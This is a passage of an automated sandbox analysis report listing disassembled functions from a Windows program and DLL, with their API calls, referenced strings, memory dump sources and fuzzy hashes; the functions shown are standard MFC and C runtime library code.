                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 1549993015-0
                                                                                                                • Opcode ID: 09505dbe4db555d6bd3f5c2a8bd9affaf62ac3bf33e379d28d8ae354bbbafdb8
                                                                                                                • Instruction ID: 475f2a04b117e8f9935f365539cf1ad583130fee67d3d37b5b1dbdeb361e89ba
                                                                                                                • Opcode Fuzzy Hash: 09505dbe4db555d6bd3f5c2a8bd9affaf62ac3bf33e379d28d8ae354bbbafdb8
                                                                                                                • Instruction Fuzzy Hash: 53F09032600513EBEB315F2DF80CA9B7B78FF46325B040259F60192194CB30AC96CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127B4CD, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0127B4D4
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0127B676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ClearException@8H_prolog3_ThrowVariant
                                                                                                                • String ID: @$@
                                                                                                                • API String ID: 2495710544-149943524
                                                                                                                • Opcode ID: 2f1da69549c450effb4bcd69f2a079b82f5fb1e006cc524391f4bcfae44a27ec
                                                                                                                • Instruction ID: dae20a4a5ea99a79eb2f010caef899cba9fa71b6fb3bcc68068ef017e0ec8473
                                                                                                                • Opcode Fuzzy Hash: 2f1da69549c450effb4bcd69f2a079b82f5fb1e006cc524391f4bcfae44a27ec
                                                                                                                • Instruction Fuzzy Hash: 9F51ED70E1021AAFDB18DFA9D894AEEBBF9BF48704F104169F519EB250EB709905CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10065D30, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10065DC8
                                                                                                                  • Part of subcall function 10082C9B: RaiseException.KERNEL32(?,?,10061219,?,?,E05FA6D8,?,?,?,?,10061219,?,100CCC84,E05FA6D8), ref: 10082CF0
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10065E08
                                                                                                                Strings
                                                                                                                • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 10065DD7
                                                                                                                • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 10065D97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                                                • API String ID: 3476068407-3345525433
                                                                                                                • Opcode ID: 276ecf827510ad7e7dcbc380ff4a4b69416b546188301207d46956c09d18c143
                                                                                                                • Instruction ID: 3c8d855953840033357e077e12ec276f3adbcaa4d6ab720f6bc2fd80d0b72676
                                                                                                                • Opcode Fuzzy Hash: 276ecf827510ad7e7dcbc380ff4a4b69416b546188301207d46956c09d18c143
                                                                                                                • Instruction Fuzzy Hash: 2D2172795087809BE720EB60CD42F9BB7E8FF48750F40891AF585D3281EB75A905CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10095904, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp
                                                                                                                • String ID: ACP$OCP
                                                                                                                • API String ID: 856254489-711371036
                                                                                                                • Opcode ID: c39ee5f2416e12b6e8b7de67418e85b720e9a9484df51c6bd2f24ab56c07ca6a
                                                                                                                • Instruction ID: 5ab68204d6153f1dec5dde0160c2f7de93d8cb45c5a72420a69f003293ebf2ce
                                                                                                                • Opcode Fuzzy Hash: c39ee5f2416e12b6e8b7de67418e85b720e9a9484df51c6bd2f24ab56c07ca6a
                                                                                                                • Instruction Fuzzy Hash: F4012136901616EAF751DA56EC42BCA33D8EF012F7F144411FE0CEA185F622E6519398
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001E5B, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10001F0B
                                                                                                                  • Part of subcall function 10001D04: std::_System_error::_System_error.LIBCPMT ref: 10001D5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8System_errorSystem_error::_Throwstd::_
                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                • API String ID: 3384526707-1866435925
                                                                                                                • Opcode ID: 0ca4aa5bdc5a0726f339ca859ed6405d5c1700d209d92a4d612475e8cc3e2db9
                                                                                                                • Instruction ID: 7b0aa3254a6a8e6d9570d8c521cdb712a5a35f6a0a26a85b9f810a8c35b8dc44
                                                                                                                • Opcode Fuzzy Hash: 0ca4aa5bdc5a0726f339ca859ed6405d5c1700d209d92a4d612475e8cc3e2db9
                                                                                                                • Instruction Fuzzy Hash: 1E01D278508384BAE700CA90CD12FEE73A4EF50782F40882DFB985A082D7B1F941D753
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126A167, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01270000: EnterCriticalSection.KERNEL32(01389DA0,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 0127002F
                                                                                                                  • Part of subcall function 01270000: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270045
                                                                                                                  • Part of subcall function 01270000: LeaveCriticalSection.KERNEL32(01389DA0,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270057
                                                                                                                  • Part of subcall function 01270000: EnterCriticalSection.KERNEL32(00000000,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270063
                                                                                                                  • Part of subcall function 0127063B: __EH_prolog3_catch.LIBCMT ref: 01270642
                                                                                                                  • Part of subcall function 0126AA72: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 0126AA98
                                                                                                                  • Part of subcall function 0126AA72: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0126AAA8
                                                                                                                  • Part of subcall function 0126AA72: EncodePointer.KERNEL32(00000000,?,00000000), ref: 0126AAB1
                                                                                                                  • Part of subcall function 0126AA72: LoadLibraryExW.KERNEL32(00000028,00000000,00000800,?,00000000), ref: 0126AAD3
                                                                                                                • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0126A1A9
                                                                                                                • FreeLibrary.KERNEL32(?,?,Function_00006D6E,?,00000000,?,01267C70,?,00000000,?,?,?,01267745,00000028,0126147C), ref: 0126A1B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AddressEnterLibraryProc$EncodeFreeH_prolog3_catchHandleInitializeLeaveLoadModulePointer
                                                                                                                • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                • API String ID: 2316587930-63838506
                                                                                                                • Opcode ID: a6422ec1bbc9a40926c0c6f65fadfa5d15849ed34071edd0d9293dfa2e178efa
                                                                                                                • Instruction ID: 9f87715c169aff19039b1853d6926ddbfba4eabe39e43d143c4fdc70825e996c
                                                                                                                • Opcode Fuzzy Hash: a6422ec1bbc9a40926c0c6f65fadfa5d15849ed34071edd0d9293dfa2e178efa
                                                                                                                • Instruction Fuzzy Hash: E101D131560707EBDF222F79DC09B6B7A98BF007A6F008859F61BA2490EB71D4909760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264E7C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(Advapi32.dll,?,?,01271A75,00000000,?,00000000,?,?,?,?,00000000,00000000,?,?), ref: 01264E8C
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 01264E9C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: Advapi32.dll$RegCreateKeyTransactedA
                                                                                                                • API String ID: 1646373207-1184998024
                                                                                                                • Opcode ID: e12f175b53382cee638fe86fad160c1023fd313b41f10c90cbd7ce7691ef2aab
                                                                                                                • Instruction ID: 44ae3e00f6f812593cc55540798cd4131b4d0ce9c55a3e300f7ee08e5bd0d907
                                                                                                                • Opcode Fuzzy Hash: e12f175b53382cee638fe86fad160c1023fd313b41f10c90cbd7ce7691ef2aab
                                                                                                                • Instruction Fuzzy Hash: E3F0FF3216414AEBEF226F98EC04BE67FA9EF0C665F044419FB95904A0D772D4F0EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126599E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 012659B0
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 012659C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: Advapi32.dll$RegDeleteKeyTransactedA
                                                                                                                • API String ID: 1646373207-1972538232
                                                                                                                • Opcode ID: 5a25774488a627ac1960559528b25794754a320d1f72cc7ced619a7e1b1be9dd
                                                                                                                • Instruction ID: df5cd66f675270d280e689636b3b276f43abbbacf4349e40b943dcb1bb94ae65
                                                                                                                • Opcode Fuzzy Hash: 5a25774488a627ac1960559528b25794754a320d1f72cc7ced619a7e1b1be9dd
                                                                                                                • Instruction Fuzzy Hash: AEF08232221142ABAF301A5EAD09DA77BACEFC6AB6304003EB655D0040D67284C0DBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01273CB0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 01273CD5
                                                                                                                • GetProcAddress.KERNEL32(00000000,AfxmReleaseManagedReferences), ref: 01273CE5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: AfxmReleaseManagedReferences$mfcm120.dll
                                                                                                                • API String ID: 1646373207-328735874
                                                                                                                • Opcode ID: 540551ddf76b323bfa767c1208ab2929a3ba6cdca7a20c1efb999260f035887e
                                                                                                                • Instruction ID: 2190081c28deb8deb67d41ad5069ced79752995f17215972a9aa8845a3b656a7
                                                                                                                • Opcode Fuzzy Hash: 540551ddf76b323bfa767c1208ab2929a3ba6cdca7a20c1efb999260f035887e
                                                                                                                • Instruction Fuzzy Hash: 89F05472A1020BA7DB10DE6EBC89DAFB7ACFF45610744046EB905D7140DE71D50497A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264EDF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(Advapi32.dll,?,?,01264A6E,80000001,software,00000000,0002001F,?), ref: 01264EEF
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 01264EFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: Advapi32.dll$RegOpenKeyTransactedA
                                                                                                                • API String ID: 1646373207-496252237
                                                                                                                • Opcode ID: 2e2d0f0c5a9c2850711e6ff8d9522f3e74e0149fa8178afc5fd401119649002d
                                                                                                                • Instruction ID: 99dab86046d7aa0a33841a229cb379a6eb70dfec5002e8c2025211cb6e4b082f
                                                                                                                • Opcode Fuzzy Hash: 2e2d0f0c5a9c2850711e6ff8d9522f3e74e0149fa8178afc5fd401119649002d
                                                                                                                • Instruction Fuzzy Hash: DFF0543216425AABEF212FE8AD0CB963B9DEB0C666F14042DBB8190090C77180E0DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127FA10, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?), ref: 0127FA26
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 0127FA36
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: GetFileAttributesTransactedA$kernel32.dll
                                                                                                                • API String ID: 1646373207-3426858862
                                                                                                                • Opcode ID: 4a317c77b69c6cd892ef95b599c93cccdfe961753020655867ec351e4ff0fdc1
                                                                                                                • Instruction ID: 6238fc27e484be0bb7b06b12fda98f4dd3e5c88e10ddd486e0fb18f460511d95
                                                                                                                • Opcode Fuzzy Hash: 4a317c77b69c6cd892ef95b599c93cccdfe961753020655867ec351e4ff0fdc1
                                                                                                                • Instruction Fuzzy Hash: CBF0823112C217EBEF306F9CAD08FA77BE8AF04752F04042DAB3492054C7B194A0DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012773C4, Relevance: 6.2, APIs: 4, Instructions: 187COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 012773CB
                                                                                                                • VariantClear.OLEAUT32(?), ref: 01277488
                                                                                                                • CoTaskMemFree.OLE32(?,0000000C,01277617,0000000C,012777DC), ref: 01277531
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,?,?,?,?,?,?,?,0000000C,01277617,0000000C,012777DC), ref: 01277540
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 365290523-0
                                                                                                                • Opcode ID: 890e73388dae3a2ba7c4b80431ea8a2e434044e4f8b8c9c68ec480de1410a431
                                                                                                                • Instruction ID: 7f889fdd222d03d3689fb7c8e89dbd4784d8e3c2c1ed2948700fbdcd4750ca19
                                                                                                                • Opcode Fuzzy Hash: 890e73388dae3a2ba7c4b80431ea8a2e434044e4f8b8c9c68ec480de1410a431
                                                                                                                • Instruction Fuzzy Hash: 83715B74721613EFDB28DF69D998A7ABBB4FF04705B14416CEA069B660CB31F850CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0128DBF4, Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AdjustPointer_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1721217611-0
                                                                                                                • Opcode ID: fc452ea73b267978dbec0cd06a5562b12d0d9cf0b2337dda2c2c2207e2c21218
                                                                                                                • Instruction ID: 32a85eb6e09d05de2a14ddafc44204c90d87ec9dbb0e9b14b753ed553fcafa9e
                                                                                                                • Opcode Fuzzy Hash: fc452ea73b267978dbec0cd06a5562b12d0d9cf0b2337dda2c2c2207e2c21218
                                                                                                                • Instruction Fuzzy Hash: 6D41A83626530BFAFF25BEA8D881B7A7BE4AF50715F14801DEA45861D0EB72E488C710
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012661AC, Relevance: 6.2, APIs: 4, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindow.USER32(00000001,00000005), ref: 0126626E
                                                                                                                • SetWindowContextHelpId.USER32(00000000,?), ref: 012662D7
                                                                                                                • GetParent.USER32(00000000), ref: 012662E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$ContextHelpParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2037418093-0
                                                                                                                • Opcode ID: b24eb8d960a4781ec32f1017659b697eafb5a481eb280bc689c6d66f551d7474
                                                                                                                • Instruction ID: 41bdf8deb3b22ef8654d87b00334da233d705103f5d1bbd1cb21e2f5b398628e
                                                                                                                • Opcode Fuzzy Hash: b24eb8d960a4781ec32f1017659b697eafb5a481eb280bc689c6d66f551d7474
                                                                                                                • Instruction Fuzzy Hash: D9516370A1020AEFDF25DF58C884AAE7BB9FF48710F148129EE19972C5D770DA91CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10068520, Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 1006852A
                                                                                                                  • Part of subcall function 1007FDFC: __FF_MSGBANNER.LIBCMT ref: 1007FE13
                                                                                                                  • Part of subcall function 1007FDFC: __NMSG_WRITE.LIBCMT ref: 1007FE1A
                                                                                                                  • Part of subcall function 1007FDFC: RtlAllocateHeap.NTDLL(014D0000,00000000,00000001,00000001,?,?,?,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?), ref: 1007FE3F
                                                                                                                  • Part of subcall function 100A33D8: std::_Lockit::_Lockit.LIBCPMT ref: 100A33E2
                                                                                                                • _malloc.LIBCMT ref: 1006854F
                                                                                                                • std::exception::exception.LIBCMT ref: 10068574
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1006858B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3043633502-0
                                                                                                                • Opcode ID: 240f7fd6f8bdfc9c4f4ab6b20902290ca490e750ec184b6517f8411a91f24b97
                                                                                                                • Instruction ID: 6bf416ab3f7b1a4606e450f31ba0683b922b7d9e519bd755ce8a32bb9140023e
                                                                                                                • Opcode Fuzzy Hash: 240f7fd6f8bdfc9c4f4ab6b20902290ca490e750ec184b6517f8411a91f24b97
                                                                                                                • Instruction Fuzzy Hash: 2F312676A043465BC701DE68D88579BBBD6EFC0290F458A2DF884C7241EB75EB09C6A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

